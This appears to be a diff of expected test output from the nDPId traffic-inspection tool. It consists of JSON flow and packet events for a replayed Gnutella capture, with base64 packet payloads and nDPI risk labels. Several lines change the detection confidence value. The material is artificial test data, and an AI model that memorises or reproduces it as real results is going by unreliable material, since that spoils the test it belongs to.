+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":95716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95716,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGLgAAIARtUEKAAIPsGOwFHAJGMoAWdWFw\/gxApkT0lWtd136yOWRcEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":2,"flow_last_seen":95753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95753,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBAoAAEARPftthLxiCgACD\/WDcAkC3zUCOt4xAkt+phdWa3WZX\/1iLEQAAMACAAAGR1RLRwAA4JsjIdkeuStic2CcxenuP1eRs7wEbYS8YvWDAQAAAATOKYIxFFdTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":3,"flow_last_seen":95754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95754,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBlcAAIAREjIKAAIPaO6s+nAJW\/wAWVUmk6UxAqo+0NIYX4FTPMU3uEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1244,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":95754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95754,"pkt":"UlQAEjUCCAAn5uVZCABFAABt5WoAAIARNr4KAAIPR+3KW3AJPvUAWTG5sdMxAjDioXa7maFRwy28tUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1244,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1244,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1245,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":95754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95754,"pkt":"UlQAEjUCCAAn5uVZCABFAABtX54AAIARHeoKAAIPXNlUEHAJTv8AWaUwJBUxAlN7nQQgyNq1K1wDakQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":2,"flow_last_seen":95773,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95773,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBAsAAEARB2mwY7AUCgACDxjKcAkC343Vw\/gxApkT0lWtd136yOWRcEQAAMACAAAGR1RLRwAA8snLCFuSuhsM38lDoCe4Q7IZIaMEsGOwFBjKAQAAAARm60BZFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":95784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95784,"pkt":"UlQAEjUCCAAn5uVZCABFAABtMiYAAIARW8MKAAIPXjZCUnAJ+JUAWU8lLkYxAuq77b+oti7DkMaMrEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":95784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95784,"pkt":"UlQAEjUCCAAn5uVZCABFAABtkeMAAIARbpoKAAIPYOzNB3AJh+oAWd3xqy0xAvOz2v7bFV7JjaoOuEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":95784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95784,"pkt":"UlQAEjUCCAAn5uVZCABFAABtcekAAIARV2IKAAIPrbe3bnAJ6hAAWRURh5oxAjZAPvXTOccHXf+KmUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":2,"flow_last_seen":95818,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95818,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBA0AAEARtvVc2VQQCgACD07\/cAkC3\/0wJBUxAlN7nQQgyNq1K1wDakQAAMACAAAGR1RLRwAA9cCVEE\/2P06nFdVsmWWAWjUBRZwEXNlUEE7\/AQAAAATtCo4VFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 
01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":2,"flow_last_seen":95892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95892,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBA8AAEAROelg7M0HCgACD4fqcAkC3\/BRqy0xAvOz2v7bFV7JjaoOuEQAAMACAAAGR1RLRwAA+Ts9p8WeGiSZuDZKSPQI3121aXEEYOzNB4fqAQAAAASVRD4TFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo4w=="} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
